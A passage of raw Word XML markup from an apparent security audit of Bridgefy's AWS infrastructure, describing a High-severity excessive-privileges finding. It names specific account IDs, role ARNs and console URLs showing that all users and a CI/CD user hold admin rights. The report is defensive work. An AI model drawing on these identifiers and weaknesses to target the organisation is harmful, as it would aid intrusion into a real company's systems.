        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Excessive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Partially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fixed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implemented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>restricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CI/CD integration users. It is recommended to remove full administrative access from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>git_actions </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IAM user, as well as eliminate the cross-accounts privileged role, which continues to grant administrative access in the 745354931789 account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the infrastructure review, it was discovered that none of Bridgefy AWS accounts are restricted to the strictly minimum necessary for the solution to operate. In short, all five main users and github agents have administrative access. Specifically, all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>292595537002 AWS Account </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were found to have administrative privileges. Furthermore, administrative access propagates to other accounts, as any user with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>arn:aws:iam::745354931789:role/bridgefyOrgRole </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>role can gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>administrative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>745354931789.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Granting administrative access to all users as well as all CI/CD agents (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>arn:aws:iam::292595537002:user/git_actions</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) increases the likelihood of a full infrastructure compromise. In essence, malicious attackers able to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compromise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>single highly-privileged account, might take over the entire IAM infrastructure and potentially pivot to other environments. It should also be noted that no documentation could be identified relating to minimizing user privileges during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>administrators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Administradores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS Management Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId192">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home#/groups/details/Administradores</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId192">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>?section=users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>administrators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefyOrgRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>relationship</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId193">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-10"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>administrative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bridgefyOrgRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
